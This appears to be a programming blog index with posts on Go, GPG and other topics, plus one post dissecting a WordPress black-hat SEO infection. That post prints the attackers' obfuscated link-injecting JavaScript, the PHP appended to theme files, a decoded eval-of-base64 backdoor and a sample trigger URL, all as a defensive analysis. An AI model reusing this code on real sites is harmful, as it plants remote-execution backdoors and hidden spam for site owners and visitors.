June 28, 2014

Dump Go Abstract Syntax Tree

Posted in Software at 20:09 by graham

Go has good support for examining and modifying Go source code. This is a huge help in writing refactoring and code analysis tools. The first step is usually to parse a source file into it’s Abstract Syntax Tree representation. Here’s a complete program to display the AST for a given Go file:

package main

import (
    "go/ast"
    "go/parser"
    "go/token"
    "os"
)

func main() {
    fset := new(token.FileSet)
    f, _ := parser.ParseFile(fset, os.Args[1], nil, 0)
    ast.Print(fset, f)
}

Use:

  • Save that as goast.go
  • Build it: go build goast.go
  • Run it: ./goast <myfile.go>

May 24, 2014

Sync, a Unix way

Posted in Software at 05:49 by graham

Ever since Dropbox, I’ve been searching for a self-hosted, secure (and now Condi-free) way of keeping my machines synchronised and backed up. There are lots. I tried many, wrote a couple myself, but none were exactly what I wanted.

My problem was thinking Windows, looking for a single program. Once I started thinking Unix, looking for modular components, the answers were obvious.

Storage

First we need a remote master storage to sync against, somewhere to backup our files. And we want that exposed as a local filesystem. I use the most obvious answer, sshfs:

sudo apt-get install sshfs
mkdir -p /home/graham/.backup/crypt  # Why 'crypt'? Read on.

sshfs server.example.com:backup /home/graham/.backup/crypt

You can use any storage that can appear as a filesytem, such as FTP (via curlftpfs), NTFS, and many others.

Encryption

There’s two kinds of data: public data, and encrypted data. We want the second kind. Just layer encfs:

Read the rest of this entry »

May 4, 2014

GopherCon 2014 favorite talks, notes

Posted in Software at 19:39 by graham

My favorite talks at GopherCon 2014:

  • Peter Bourgon: Best Practices for Production Environments Soundcloud were an early Go adopter, and this talk is their distilled learnings from two years of Go: Repo structure, config, logging, testing, deployment, and lots more. The one talk you need if you’re starting (or running) a significant Go project, and you want to do it right.

  • Petar Maymounkov: The Go Circuit: Towards Elastic Computation with No Failures Stick with this one. It starts off quite academic, but gets fascinating very fast. He models whole companies as a distributed system (based on CSP), then builds a language-agnostic cluster programming library where the API is a filesystem The Circuit. One of the highlights of the conference for me was building a filesystem with Petar in the hallway.

  • John Graham-Cumming: A Channel Compendium John is the author of those great in-depth Cloudflare blog posts. Solid talk about Go channels. nil channels always block, so you can ‘disable’ a select clause by setting a channel to nil. Closed channels never block. Heartbeat is just time.Tick, timeout is time.After. Go programs are small sequential pieces joined by channels.

Those are the three talks I enjoyed most. Here are my general notes on the conference and a few of the other talks. Read the rest of this entry »

March 2, 2014

Raw sockets in Go: IP layer

Posted in Software, Uncategorized at 00:41 by graham

In the Internet protocol suite we usually work at the transport layer, with TCP or UDP. Go (golang) has good support for working with lower layers. This post is about working one layer down, at the IP layer.

If you want to use protocols other than TCP or UDP, or craft your own packets, you need to connect at the IP layer.

Receive

Let’s read the first ICMP packet on localhost:

package main

import (
    "fmt"
    "net"
)

func main() {
    protocol := "icmp"
    netaddr, _ := net.ResolveIPAddr("ip4", "127.0.0.1")
    conn, _ := net.ListenIP("ip4:"+protocol, netaddr)

    buf := make([]byte, 1024)
    numRead, _, _ := conn.ReadFrom(buf)
    fmt.Printf("% X\n", buf[:numRead])
}

Read the rest of this entry »

March 1, 2014

Three best programming books

Posted in Software at 23:19 by graham

Here are my three favorite programming books, the ones I consider most important and would most recommend. There’s a good list on stack overflow too, if you prefer the wisdom of crowds to the wisdom of me.

Code Complete, Steve McConnell

This is the book that took me from enthusiastic amateur to professional. It covers the programming-in-the-small that you will do every day for the rest of your career: Naming variables, writing for loops, that type of thing. I know, you know how to write a for loop already.

This book will make you better at the small things.

Code Complete: A Practical Handbook of Software Construction

The Art of Unix Programming, Eric S. Raymond

It took me a very long time to read this book. I would pick it, get a few pages in, have an epiphany, and go re-write some things.

Unix is the only constant in our world. The programming language you use will change many times, the tools you use will change all the time, and even SQL is not as much of a constant as it once was. But Unix will always be there for you. Improving your Unix knowledge is the single best investment you can make as a programmer.

But this is not just a book about Unix. It’s a book about the philosophy of Unix, about The Way, and it intends to bring you enlightenment in the Zen Buddhism sense.

For me at least, it did.

The Art of UNIX Programming

The Linux Programming Interface, Michael Kerrisk

This is the Linux grimoire, the spell book with all the spells. It’s over $60, 1500 pages, and you must never get it wet or read it after midnight.

Pretty much everything interesting you do in Linux (open a file, write to a socket, start a process, sleep. allocate memory, everything) is a syscall. This books is all the syscalls, and extensive information around them.

It will answer all your questions.

The Linux Programming Interface: A Linux and UNIX System Programming Handbook

December 12, 2013

Go: How slices grow

Posted in Software at 05:49 by graham

In Go (golang) what happens to memory when you append to a slice?

If there’s enough space in the slice’s backing array, the element just gets added. If there’s not enough space, a new array is allocated, all the items are copied over, and the new item is added at the end. The interesting part is allocating that new array. And here’s the answer:

Go slices grow by doubling until size 1024, after which they grow by 25% each time

This is an implementation detail and may change. The above is correct for Go 1.1 and 1.2.

Try it out:

package main

import "fmt"

func main() {
    var x []int  // Same as x := make([]int, 0)
    for i := 0; i < 100; i++ {
        fmt.Printf("%d: %p cap %d\n", i, x, cap(x))
        x = append(x, i)
    }
}

Read the rest of this entry »

December 7, 2013

Kinesis Advantage after four months

Posted in Software at 23:58 by graham

I have been using a Kinesis Advantage keyboard for the past four months, since August. I love it. Here’s my trip report.

Kinesis Advantage

Before this keyboard I had been using Microsoft Natural keyboards for many many years.

Let’s cut straight to the chase: The first three days were very hard. It’s the same feeling as when I switched to vim. You tell your fingers to do something and they don’t do it. It’s especially hard when you do lots of text chat. My typing rate went way down, so I couldn’t ‘talk’ as fast.

Read the rest of this entry »

October 22, 2013

Realtime Conf 2013: Favorite talks

Posted in Software at 05:33 by graham

Realtime Conf 2013 just finished in Portland. It was an unusual conference in many ways. The “production values” and effort the &yet team put into it were simply astounding. The conference included, amongst others, a book, a play, a marching band, boxes of dirt, meth samples, and a beautiful song (skip to 3:50).

All the videos are online. These are my three favorite:

Isaac Schleuter: Leadership and open source: Also known as “Z”, he is the main author of npm and leader of the node.js community. He teaches leadership in tweets, around a core philosophy of empathy, compassion, and grit. If your life involves having to interact with humans, I’d recommend this talk.

Ilya Grigorik: Making HTTP realtime with HTTP 2.0: HTTP 2.0 is the next version of HTTP. It is based on SPDY. It could be ready as early as next year. And it’s way cool.

Eric Rescoria: What WebRTC is good for: He wrote much of Firefox’s WebRTC implementation, and some of Chrome’s, so if you want to learn about WebRTC, watch this.

The best part for me were the conversations (especially with the XMPP folks) and how generous everyone was with their time and explanations.

September 17, 2013

WordPress Black Hat SEO dissected

Posted in Software at 21:00 by graham

Last weekend a friend asked me why there were pharma links hidden in her GoDaddy hosted WordPress site, and that led me into the WordPress black hat SEO rabbit hole.

Front end

This is what we were seeing:

pharma-links

From a browser the site looked fine. The links had been there undetected for five months! The HTML is being hidden by this CSS:

<style type="text/css">.blogcycle_p{position:absolute;clip:rect(438px,auto,auto,438px);}</style>

But that CSS doesn’t appear anywhere on the page. It’s being written out by this obfuscated Javascript:

var _gw7 = [];
_gw7.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
_gw7.push(['_setOption', '6918518510413211616817818117316919116917817116518219318']);
_gw7.push(['_trackPageview', '2181185175186175181180128167168185181178187186171129169']);
_gw7.push(['_setOption', '1781751821281841711691861101221211261821901141671871861']);
_gw7.push(['_trackPageview', '8111416718718618111412212112618219011112919513011718518']);
_gw7.push(['_setOption', '6191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Presumably this is being done so that Google doesn’t notice that the links are not visible. The number in the _gw7 variable name varies – maybe it’s random or maybe a version number. You can find many other victims by searching for 13018518….

Back end – display

The big question then became: How the hell is this getting onto the page?

The answer is the PHP has been edited. The functions.php in every single theme had this appended to the bottom (scroll all the way to the right for the important part):

if (!function_exists("b_call")) {
function b_call() {
if (!ob_get_level()) ob_start("b_goes");
}
function b_goes($p) {
if (!defined('wp_m1')) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_iconfeed1'))) {
        return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define('wp_m1', $m);
    define('wp_n1', $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");
}

My knowledge of WordPress is basic, so the first few times I looked at this it seemed fine. It was only thanks to an analysis by NinjaFirewall that I went and looked again. The get_option('_iconfeed1') is reading from the database, reversing the value, and injecting it into the page. The name of the option changes, presumably it’s picked from a list at infection time. There’s a nice touch here where it doesn’t show to logged in users, which probably complicates investigation (“My site looks fine, your computer must have a virus or something!”).

In the wp_options database table that _iconfeed1 contains the Javascript and HTML string with all the pharma links, reversed. Why is it reversed? I’m not sure. Maybe it defeats some wordpress plugins that look for this type of thing. It certainly defeated my initial grep of the database dump.

Back end – input

But wait, it’s about to get so much better, because the next question is how the hell did they write to wp_options. An svn diff of the wordpress install against the repo reveals these new files:

  • wp-content//entry-nav.php # In several, but not all, themes
  • wp-content//sidebar-meta.php # Only in one theme
  • wp-admin/ms-media.php
  • wp-admin/includes/class-wp-menu.php
  • wp-includes/theme-compat/archive.php
  • wp-includes/post-load.php

The names differ on other infected sites, but seem chosen to look like parts of WordPress. And what’s in those file? Oh, you’re in for a treat – here’s the first few lines of one:

$bawdy= 'T';
$concoct = 'e';$cretin= '2XRa)$r)';$eyers= ';$_';

$befogged= 'e'; $gayety ='a';$jolynn ='8'; $armour ='$0QP('; $hotdick ='K';$brief='a)Q$TM';$boxtop = 'e'; $grating='i'; $fuckyoufuckyou ='s';$claus='P';
$blitzes = '$[n>EO_';$cancels = 'N(gL';$fernanda= 'cV;E;r)6';$hasty =':i_e_';

$carla = '$(Wa'; $duplicable=',2aC(';
$dolli = 't'; $contributing='$';

They all follow the same pattern, with variables names clearly taken from a word list. Most of them didn't seem to run, they were missing variable and a closing php tag. For analysis, here's a full one (minus php tag) that did run, and that I've hacked around to display it's output: obfuscated php (To understand it look for 'hello').

It decodes to this:

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["b02005f9ffdf8"])
    ? $i["b02005f9ffdf8"]:
(isset($i["HTTP_B02005F9FFDF8"])?$i["HTTP_B02005F9FFDF8"]:die
);
eval(base64_decode($a));)

That takes base64 encoded PHP code in either a URL parameter or a cookie, and runs it. The cookie part is nice, because it won’t show in the access logs. The hex string is a nice touch too. It changes for each infection, so other people will have a hard time taking advantage of the back door.

To run echo "<h1>Hello</h1>"; the attacker would hit something like:

http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw==

Who did it? How?

Who did it? In the apache access logs the only hit I see on one of those injection scripts is from a hosting provider in Germany that does VPS and dedicated hosting. One single hit, and because it has a cookie I don’t have the PHP that they ran. Around that time I see a ton of probing from an address in Israel, a little suspicious given that the site is a local Canadian business, but it’s certainly not conclusive. I have no idea who did it.

How? I’m not sure. There were only two accounts on that site, with what I’d consider good passwords. Like every WordPress site it was getting lots of brute force cracking attempts, but POSTing to the login page gets you about 2 attempts / second (my sites use BruteProtect to reduce this). My leading theory then is that the attackers got into a different site on the shared hosting, and just wrote into every other site on that machine (which are just different directories it seems).

How did I fix it? I moved my friend off GoDaddy’s shared hosting, to my own wordpress multi-site on a Linode server.

The crazy part is that the sole purpose of the attack is to raise the page rank of some pharma links. I didn’t realise SEO was such big business that people would go to all this work.

I am also quite in admiration of the poor programmer who had to build this. Imagine trying to debug the CSS that was output by your reversed obfuscated Javascript, which was written into the database by base 64 encoding it and feeding it to an obfuscated PHP script! I tip my hat to you, Mr Back Hat SEO programmer.

Here are some other people who have the same problem but with different variables. And here’s what seems to be an earlier variant of this attack.

If you have any more information about his, please let me know in the comments, and I’ll update the post. Thanks!

July 30, 2013

How GPG works: Encrypt

Posted in Software at 22:02 by graham

Here’s what happens when you encrypt a message with GPG / GnuPG (and probably other OpenPGP implementations):

  1. Generate session key

    When you encrypt a file to someone (-r person on the command line), GPG generates a session key, which is a large random number. You can see it when you decrypt a message:

    gpg --show-session-key myfile.gpg
    
  2. Choose a symmetric cipher

    GPG then looks at the recipients public key to find their preferred symmetric cipher. If you have my key on your ring (get it by doing gpg --recv-keys 0x127CFCD9B3B929D2) you can see my preferred symmetric cipher by typing:

    gpg -r graham -e --verbose test.txt
    

    It should be AES256.

  3. Encrypt using chosen cipher and generated session key

    Next it compresses then encrypts the file using the session key and the preferred cipher. So until now we’re still all symmetric encryption.

  4. Encrypt session key with public key

    Finally it encrypts that session key using the recipients public key (using RSA), and prepends the result to the front of the message. If there are several recipients, this step is repeated once for each person.

The passphrase GPG asks for when decrypting or signing a message, has nothing to do with message encryption. It is only used to symmetric encrypt your private key (default is CAST5 cipher). That’s in case someone steals your private key file. In terms of how GPG works, you can ignore the passphrase. If you just encrypt a message (without signing it) you won’t need to enter your passphrase at all (but in practice your should always sign your messages).

« Previous entries Next Page » Next Page »